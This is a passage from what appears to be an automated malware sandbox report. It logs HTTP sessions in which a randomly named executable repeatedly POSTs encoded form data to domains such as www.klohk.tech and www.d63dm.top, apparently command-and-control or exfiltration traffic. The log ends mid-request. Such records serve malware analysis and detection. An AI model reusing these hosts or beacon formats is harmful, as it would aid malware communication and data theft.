                                                                  Data Raw: 4e 6a 48 70 54 66 68 3d 4e 45 55 51 6e 71 39 53 61 62 37 6d 7a 75 51 52 45 34 53 66 75 52 79 78 62 65 66 58 75 77 35 6d 2f 6e 59 37 44 63 52 59 36 78 35 39 56 78 53 71 58 57 45 69 2b 2f 78 57 4f 34 4e 4b 4e 6d 6a 56 79 6f 73 79 49 34 34 37 48 4e 35 61 47 51 76 4e 6b 48 59 76 47 2b 6b 7a 62 6c 70 72 70 68 4d 77 75 41 36 38 4f 54 76 74 38 5a 41 61 77 37 31 52 63 47 36 58 32 2b 49 51 61 62 30 56 32 6b 74 6f 54 70 33 79 72 4c 78 76 69 7a 4e 76 67 53 79 30 44 73 47 5a 76 34 6b 51 39 42 66 36 52 39 35 79 6d 67 70 72 59 77 65 51 7a 64 68 4c 46 6f 76 7a 30 66 4d 6b 62 2b 4d 74 65 50 33 71 68 6a 41 2b 63 37 4c 7a 65 33 4d 3d
                                                                  Data Ascii: NjHpTfh=NEUQnq9Sab7mzuQRE4SfuRyxbefXuw5m/nY7DcRY6x59VxSqXWEi+/xWO4NKNmjVyosyI447HN5aGQvNkHYvG+kzblprphMwuA68OTvt8ZAaw71RcG6X2+IQab0V2ktoTp3yrLxvizNvgSy0DsGZv4kQ9Bf6R95ymgprYweQzdhLFovz0fMkb+MteP3qhjA+c7Lze3M=
                                                                  Nov 22, 2024 14:46:22.583301067 CET871INHTTP/1.1 200 OK
                                                                  date: Fri, 22 Nov 2024 13:46:22 GMT
                                                                  server: Apache
                                                                  set-cookie: __tad=1732283182.2614315; expires=Mon, 20-Nov-2034 13:46:22 GMT; Max-Age=315360000
                                                                  vary: Accept-Encoding
                                                                  content-encoding: gzip
                                                                  content-length: 576
                                                                  content-type: text/html; charset=UTF-8
                                                                  connection: close
                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 11 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 b9 6d 6d b3 cd 08 55 53 e4 e7 48 54 78 e5 74 4f 40 c7 1e 45 4c 78 47 f9 46 ee e5 39 1a 83 77 4a c4 f9 c6 e7 b5 36 6b 74 bd d3 86 72 ad 6b cc 3a 6d b2 8d 8f cb 22 3f 63 5f 4b 55 46 7b e9 c0 61 a5 1d 2a fa d9 6a b3 05 01 49 43 d4 2f f2 fc 70 38 64 cf ea f2 79 37 c7 fc 43 b2 8c a2 3c 87 5b 24 90 40 ba 43 bb 23 b0 35 cc 67 33 e8 b4 72 d6 a3 b2 a6 f2 40 16 f0 0e d5 8e 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 de 19 45 da 1a 3e 6e db 95 54 db 9b 31 55 3a 85 fb 68 72 d0 a6 b2 87 ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f 97 49 dd 8b ab f7 c9 74 19 9d a2 88 dc 31 30 59 a5 27 70 95 fb 3e 9a 10 e0 91 c6 4d fa 67 b5 37 c1 20 f3 27 a1 61 75 ff 6d d4 2c e0 d3 b3 93 2f b7 ac 43 56 e9 7d 67 8d 26 cb a1 f5 22 c8 f6 78 0a cc 27 56 [TRUNCATED]
                                                                  Data Ascii: TMo0=pvNl;a"[$&iPrm:]lQebmmUSHTxtO@ELxGF9wJ6ktrk:m"?c_KUF{a*jIC/p8dy7C<[$@C#5g3r@%@@;i1[umLE>nT1U:hrJTo7OIt10Y'p>Mg7 'aum,/CV}g&"x'V4d=ekd;8L]K~,`'<#j9TRnz>v2!>cUsCCW_yae+n4k5'`bxjlk/a&aI=?.X,$4k0OV[h0C^\;DLl?n)1;y


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  22192.168.2.849730103.224.182.242801240C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 22, 2024 14:46:23.882862091 CET821OUTPOST /3m3e/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.klohk.tech
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 228
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.klohk.tech
                                                                  Referer: http://www.klohk.tech/3m3e/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Data Raw: 4e 6a 48 70 54 66 68 3d 4e 45 55 51 6e 71 39 53 61 62 37 6d 77 4e 59 52 49 2f 47 66 35 68 79 32 65 65 66 58 37 67 35 69 2f 6e 45 37 44 66 64 32 39 45 4a 39 56 51 69 71 55 58 45 69 39 2f 78 57 47 59 4d 41 44 47 69 62 79 6f 78 52 49 36 63 37 48 4f 46 61 47 52 66 4e 6b 32 59 73 58 2b 6b 78 58 46 70 70 30 78 4d 77 75 41 36 38 4f 53 4c 54 38 5a 6f 61 78 4b 46 52 63 6e 36 55 2f 65 49 50 64 62 30 56 79 6b 74 6b 54 70 32 56 72 4b 64 4a 69 31 42 76 67 58 65 30 44 65 75 57 32 49 6b 65 69 78 65 39 63 63 6b 33 6f 79 6c 46 52 68 36 67 2f 38 46 71 45 65 65 5a 75 39 45 69 59 2b 6b 47 65 4d 66 63 6b 55 64 57 47 59 62 44 41 67 5a 50 48 47 46 65 31 62 75 6d 31 35 64 53 53 79 6c 7a 4b 6f 72 5a
                                                                  Data Ascii: NjHpTfh=NEUQnq9Sab7mwNYRI/Gf5hy2eefX7g5i/nE7Dfd29EJ9VQiqUXEi9/xWGYMADGibyoxRI6c7HOFaGRfNk2YsX+kxXFpp0xMwuA68OSLT8ZoaxKFRcn6U/eIPdb0VyktkTp2VrKdJi1BvgXe0DeuW2Ikeixe9cck3oylFRh6g/8FqEeeZu9EiY+kGeMfckUdWGYbDAgZPHGFe1bum15dSSylzKorZ
                                                                  Nov 22, 2024 14:46:25.163870096 CET871INHTTP/1.1 200 OK
                                                                  date: Fri, 22 Nov 2024 13:46:24 GMT
                                                                  server: Apache
                                                                  set-cookie: __tad=1732283184.1678705; expires=Mon, 20-Nov-2034 13:46:24 GMT; Max-Age=315360000
                                                                  vary: Accept-Encoding
                                                                  content-encoding: gzip
                                                                  content-length: 576
                                                                  content-type: text/html; charset=UTF-8
                                                                  connection: close
                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 11 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 b9 6d 6d b3 cd 08 55 53 e4 e7 48 54 78 e5 74 4f 40 c7 1e 45 4c 78 47 f9 46 ee e5 39 1a 83 77 4a c4 f9 c6 e7 b5 36 6b 74 bd d3 86 72 ad 6b cc 3a 6d b2 8d 8f cb 22 3f 63 5f 4b 55 46 7b e9 c0 61 a5 1d 2a fa d9 6a b3 05 01 49 43 d4 2f f2 fc 70 38 64 cf ea f2 79 37 c7 fc 43 b2 8c a2 3c 87 5b 24 90 40 ba 43 bb 23 b0 35 cc 67 33 e8 b4 72 d6 a3 b2 a6 f2 40 16 f0 0e d5 8e 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 de 19 45 da 1a 3e 6e db 95 54 db 9b 31 55 3a 85 fb 68 72 d0 a6 b2 87 ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f 97 49 dd 8b ab f7 c9 74 19 9d a2 88 dc 31 30 59 a5 27 70 95 fb 3e 9a 10 e0 91 c6 4d fa 67 b5 37 c1 20 f3 27 a1 61 75 ff 6d d4 2c e0 d3 b3 93 2f b7 ac 43 56 e9 7d 67 8d 26 cb a1 f5 22 c8 f6 78 0a cc 27 56 [TRUNCATED]
                                                                  Data Ascii: TMo0=pvNl;a"[$&iPrm:]lQebmmUSHTxtO@ELxGF9wJ6ktrk:m"?c_KUF{a*jIC/p8dy7C<[$@C#5g3r@%@@;i1[umLE>nT1U:hrJTo7OIt10Y'p>Mg7 'aum,/CV}g&"x'V4d=ekd;8L]K~,`'<#j9TRnz>v2!>cUsCCW_yae+n4k5'`bxjlk/a&aI=?.X,$4k0OV[h0C^\;DLl?n)1;y


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  23192.168.2.849731103.224.182.242801240C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 22, 2024 14:46:26.546710014 CET1838OUTPOST /3m3e/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.klohk.tech
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 1244
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.klohk.tech
                                                                  Referer: http://www.klohk.tech/3m3e/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Data Raw: 4e 6a 48 70 54 66 68 3d 4e 45 55 51 6e 71 39 53 61 62 37 6d 77 4e 59 52 49 2f 47 66 35 68 79 32 65 65 66 58 37 67 35 69 2f 6e 45 37 44 66 64 32 39 45 42 39 56 69 61 71 53 45 73 69 38 2f 78 57 61 49 4d 4e 44 47 6a 48 79 6f 6f 59 49 36 51 46 48 49 42 61 47 7a 58 4e 69 43 73 73 4f 75 6b 78 66 6c 70 71 70 68 4d 70 75 41 71 34 4f 53 62 54 38 5a 6f 61 78 4a 64 52 65 32 36 55 35 65 49 51 61 62 30 6e 32 6b 73 7a 54 74 54 71 72 4b 70 2f 2b 56 68 76 67 32 79 30 51 37 61 57 2b 49 6b 63 68 78 65 66 63 63 6f 38 6f 79 35 7a 52 68 4f 5a 2f 37 78 71 45 6f 66 6c 79 63 56 2b 43 4d 49 50 52 65 72 6c 73 45 52 45 59 34 6a 76 4a 51 6b 73 4b 78 4e 74 33 4b 79 76 6e 6f 34 5a 42 45 4a 2b 47 75 65 58 61 79 78 49 51 41 78 73 57 64 49 73 2f 6e 4c 54 6f 6e 52 58 6f 63 35 53 43 57 42 6b 41 72 42 41 68 39 38 48 7a 63 30 49 47 32 47 62 59 4d 49 43 78 49 52 67 4a 50 72 51 67 6b 44 42 46 6b 44 74 5a 75 5a 4e 51 58 51 62 51 64 51 6f 48 76 2b 51 58 5a 68 4c 66 61 57 50 58 38 6e 37 4a 6e 75 55 7a 46 2f 4d 2b 4d 78 4e 69 6c 39 32 79 6c [TRUNCATED]
                                                                  Data Ascii: NjHpTfh=NEUQnq9Sab7mwNYRI/Gf5hy2eefX7g5i/nE7Dfd29EB9ViaqSEsi8/xWaIMNDGjHyooYI6QFHIBaGzXNiCssOukxflpqphMpuAq4OSbT8ZoaxJdRe26U5eIQab0n2kszTtTqrKp/+Vhvg2y0Q7aW+Ikchxefcco8oy5zRhOZ/7xqEoflycV+CMIPRerlsEREY4jvJQksKxNt3Kyvno4ZBEJ+GueXayxIQAxsWdIs/nLTonRXoc5SCWBkArBAh98Hzc0IG2GbYMICxIRgJPrQgkDBFkDtZuZNQXQbQdQoHv+QXZhLfaWPX8n7JnuUzF/M+MxNil92ylKcQorDdaB5X0oFi6ck2qtpV4nOzptq+AkBtIej8+XllOWliu1+DI78/UO/dwH/sGcGeOPSipCaQnrQOB1SOzkQioK4cxR++8ph4iGsvXi42Bm1mx90KnDCLgUdVURqMtX644Zp6imyVWuq1WGI4v9/JtZE8Go/ervCkfSfboo66tKOojIENU1RRGTA2Ge21XMg0EQDuNoWvjuTasnfE+V5jWmPLcIOEvB9tpKYeozvesFKcnXEO21zmjqPZRhd93+aH6dw5VVervG5EuylvJ9eRzHjChsSCZPVnBIBbvskaT4Vrd/0TEyqrn9rrN9z60okgpzYjyzNj3hU0V+3xmkP0AQPH03UdB2QWOadlhBWbS5w1witpzWzDJmZTjSuOX9CBO8kMtYX6rHWaHbYugApgxHYi2QEGaWUuEXWGM6aYgcythBqy7fQxz/z2NELDyWVPFUIWBncX9Z8/wZFzvfE3a3n7R1ebBZ8sDbSKm1gMjZ8Yc4S2rnh2hCmnfsjxvqOUa2zcZe4ZccVEMZXcHl6Y7d6VUqvTXtAZ4Jp+jRZf7zMECyKsO6iEuR2YoDBYKfd2mdlPCJ5ki9zkDHFGuniH/fNr1TYWAfmuVzxHYPZQ2PUArnO/odbIhRYZ/9paITeCDIv2WJQaUvAl464VkT5fEoMq54nYANs [TRUNCATED]
                                                                  Nov 22, 2024 14:46:27.865304947 CET871INHTTP/1.1 200 OK
                                                                  date: Fri, 22 Nov 2024 13:46:27 GMT
                                                                  server: Apache
                                                                  set-cookie: __tad=1732283187.3556796; expires=Mon, 20-Nov-2034 13:46:27 GMT; Max-Age=315360000
                                                                  vary: Accept-Encoding
                                                                  content-encoding: gzip
                                                                  content-length: 576
                                                                  content-type: text/html; charset=UTF-8
                                                                  connection: close
                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 11 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 b9 6d 6d b3 cd 08 55 53 e4 e7 48 54 78 e5 74 4f 40 c7 1e 45 4c 78 47 f9 46 ee e5 39 1a 83 77 4a c4 f9 c6 e7 b5 36 6b 74 bd d3 86 72 ad 6b cc 3a 6d b2 8d 8f cb 22 3f 63 5f 4b 55 46 7b e9 c0 61 a5 1d 2a fa d9 6a b3 05 01 49 43 d4 2f f2 fc 70 38 64 cf ea f2 79 37 c7 fc 43 b2 8c a2 3c 87 5b 24 90 40 ba 43 bb 23 b0 35 cc 67 33 e8 b4 72 d6 a3 b2 a6 f2 40 16 f0 0e d5 8e 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 de 19 45 da 1a 3e 6e db 95 54 db 9b 31 55 3a 85 fb 68 72 d0 a6 b2 87 ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f 97 49 dd 8b ab f7 c9 74 19 9d a2 88 dc 31 30 59 a5 27 70 95 fb 3e 9a 10 e0 91 c6 4d fa 67 b5 37 c1 20 f3 27 a1 61 75 ff 6d d4 2c e0 d3 b3 93 2f b7 ac 43 56 e9 7d 67 8d 26 cb a1 f5 22 c8 f6 78 0a cc 27 56 [TRUNCATED]
                                                                  Data Ascii: TMo0=pvNl;a"[$&iPrm:]lQebmmUSHTxtO@ELxGF9wJ6ktrk:m"?c_KUF{a*jIC/p8dy7C<[$@C#5g3r@%@@;i1[umLE>nT1U:hrJTo7OIt10Y'p>Mg7 'aum,/CV}g&"x'V4d=ekd;8L]K~,`'<#j9TRnz>v2!>cUsCCW_yae+n4k5'`bxjlk/a&aI=?.X,$4k0OV[h0C^\;DLl?n)1;y


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  24192.168.2.849732103.224.182.242801240C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 22, 2024 14:46:29.195655107 CET551OUTGET /3m3e/?NjHpTfh=AG8wkc12D4O4qfE3dc2ZpUKPRZyp2gRu+0k6EtFb5UlufQ+lVXFR/9gePpQjCGKa/ZsQJ4MYKcJmAxrfjl4cNftXSlpvpmQYoxqRDgL404wqyKQKR0qu5cYpfr80+FdsRQ==&1fo=GF14svyhH44dt HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.klohk.tech
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Nov 22, 2024 14:46:30.465423107 CET1236INHTTP/1.1 200 OK
                                                                  date: Fri, 22 Nov 2024 13:46:30 GMT
                                                                  server: Apache
                                                                  set-cookie: __tad=1732283190.6287925; expires=Mon, 20-Nov-2034 13:46:30 GMT; Max-Age=315360000
                                                                  vary: Accept-Encoding
                                                                  content-length: 1529
                                                                  content-type: text/html; charset=UTF-8
                                                                  connection: close
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 6b 6c 6f 68 6b 2e 74 65 63 68 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6b 6c 6f 68 6b 2e 74 65 63 68 2f 33 6d 33 65 2f 3f 4e 6a 48 70 54 66 68 3d 41 47 38 77 6b 63 31 32 44 34 4f 34 71 66 45 33 64 63 32 5a 70 55 4b 50 52 5a 79 70 32 67 52 75 2b 30 6b 36 45 74 46 62 35 55 6c 75 66 51 2b 6c 56 58 46 52 2f 39 67 65 50 70 51 6a 43 47 4b 61 2f 5a 73 51 4a 34 4d 59 4b 63 4a 6d 41 78 72 66 6a 6c 34 63 4e 66 74 58 53 6c 70 76 70 6d 51 59 6f 78 71 52 44 67 4c 34 30 34 77 71 79 4b 51 4b 52 30 71 75 35 63 59 70 66 72 38 30 2b 46 64 73 52 51 3d 3d 26 31 [TRUNCATED]
                                                                  Data Ascii: <html><head><title>klohk.tech</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.klohk.tech/3m3e/?NjHpTfh=AG8wkc12D4O4qfE3dc2ZpUKPRZyp2gRu+0k6EtFb5UlufQ+lVXFR/9gePpQjCGKa/ZsQJ4MYKcJmAxrfjl4cNftXSlpvpmQYoxqRDgL404wqyKQKR0qu5cYpfr80+FdsRQ==&1fo=GF14svyhH44dt&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgco
                                                                  Nov 22, 2024 14:46:30.465539932 CET565INData Raw: 6c 6f 72 3d 22 23 66 66 66 66 66 66 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 27 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6b 6c 6f 68
                                                                  Data Ascii: lor="#ffffff" text="#000000"><div style='display: none;'><a href='http://www.klohk.tech/3m3e/?NjHpTfh=AG8wkc12D4O4qfE3dc2ZpUKPRZyp2gRu+0k6EtFb5UlufQ+lVXFR/9gePpQjCGKa/ZsQJ4MYKcJmAxrfjl4cNftXSlpvpmQYoxqRDgL404wqyKQKR0qu5cYpfr80+FdsRQ==&1fo=GF1


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  25192.168.2.849733154.23.184.218801240C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 22, 2024 14:46:36.529112101 CET798OUTPOST /rqnz/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.d63dm.top
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 208
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.d63dm.top
                                                                  Referer: http://www.d63dm.top/rqnz/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Data Raw: 4e 6a 48 70 54 66 68 3d 32 34 4a 4f 4f 58 4a 38 65 34 68 4e 61 66 6f 73 42 6b 32 31 64 2f 51 45 53 44 4e 43 6a 79 46 4c 57 38 33 37 47 37 77 48 33 2f 44 44 68 7a 43 5a 52 31 4e 38 43 58 74 67 2b 67 4b 2b 34 4f 6d 37 74 73 71 65 33 62 4d 68 4f 62 49 33 38 50 76 7a 37 46 61 55 6a 61 30 2f 62 66 53 47 56 39 2b 2b 57 4a 42 6b 68 4a 6f 2b 6f 39 56 78 76 7a 65 39 72 68 70 67 36 2b 76 4b 4f 68 61 50 62 54 79 73 4b 35 70 5a 4f 73 74 32 32 42 38 69 54 45 4d 68 44 48 55 7a 4f 53 4a 4c 6a 59 6c 65 52 44 49 6d 50 38 77 2b 68 6a 4e 69 5a 45 6d 6b 7a 50 52 6e 32 55 7a 47 71 71 6b 6b 32 32 49 47 73 68 37 59 5a 44 4b 47 42 47 30 3d
                                                                  Data Ascii: NjHpTfh=24JOOXJ8e4hNafosBk21d/QESDNCjyFLW837G7wH3/DDhzCZR1N8CXtg+gK+4Om7tsqe3bMhObI38Pvz7FaUja0/bfSGV9++WJBkhJo+o9Vxvze9rhpg6+vKOhaPbTysK5pZOst22B8iTEMhDHUzOSJLjYleRDImP8w+hjNiZEmkzPRn2UzGqqkk22IGsh7YZDKGBG0=
                                                                  Nov 22, 2024 14:46:38.089654922 CET302INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Fri, 22 Nov 2024 13:46:37 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 138
                                                                  Connection: close
                                                                  ETag: "669137aa-8a"
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  26192.168.2.849734154.23.184.218801240C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 22, 2024 14:46:39.191097975 CET818OUTPOST /rqnz/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.d63dm.top
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 228
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.d63dm.top
                                                                  Referer: http://www.d63dm.top/rqnz/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Data Raw: 4e 6a 48 70 54 66 68 3d 32 34 4a 4f 4f 58 4a 38 65 34 68 4e 62 2f 59 73 4f 6c 32 31 49 50 51 48 64 6a 4e 43 6f 53 46 50 57 38 72 37 47 36 45 58 33 73 6e 44 68 53 79 5a 51 78 5a 38 46 58 74 67 78 41 4b 33 31 75 6d 4b 74 73 57 57 33 61 41 68 4f 62 73 33 38 4f 66 7a 34 79 47 54 69 4b 30 35 55 2f 53 45 4b 74 2b 2b 57 4a 42 6b 68 4a 73 59 6f 39 74 78 76 6d 4f 39 78 45 56 6a 30 65 76 4a 65 78 61 50 4b 44 79 6f 4b 35 70 6e 4f 74 68 50 32 48 67 69 54 41 49 68 44 56 38 77 46 53 4a 4e 73 34 6c 41 58 7a 68 71 41 73 59 72 67 54 4d 48 64 6e 61 67 79 35 67 4e 73 32 37 41 70 71 4d 50 32 31 67 77 70 57 6d 77 44 67 61 32 66 52 6a 34 4b 75 47 75 59 4b 78 32 6b 52 4f 59 59 7a 6c 79 69 49 61 32
                                                                  Data Ascii: NjHpTfh=24JOOXJ8e4hNb/YsOl21IPQHdjNCoSFPW8r7G6EX3snDhSyZQxZ8FXtgxAK31umKtsWW3aAhObs38Ofz4yGTiK05U/SEKt++WJBkhJsYo9txvmO9xEVj0evJexaPKDyoK5pnOthP2HgiTAIhDV8wFSJNs4lAXzhqAsYrgTMHdnagy5gNs27ApqMP21gwpWmwDga2fRj4KuGuYKx2kROYYzlyiIa2
                                                                  Nov 22, 2024 14:46:40.800514936 CET302INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Fri, 22 Nov 2024 13:46:40 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 138
                                                                  Connection: close
                                                                  ETag: "669137aa-8a"
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  27192.168.2.849735154.23.184.218801240C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 22, 2024 14:46:41.854500055 CET1835OUTPOST /rqnz/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.d63dm.top
                                                                  Connection: close
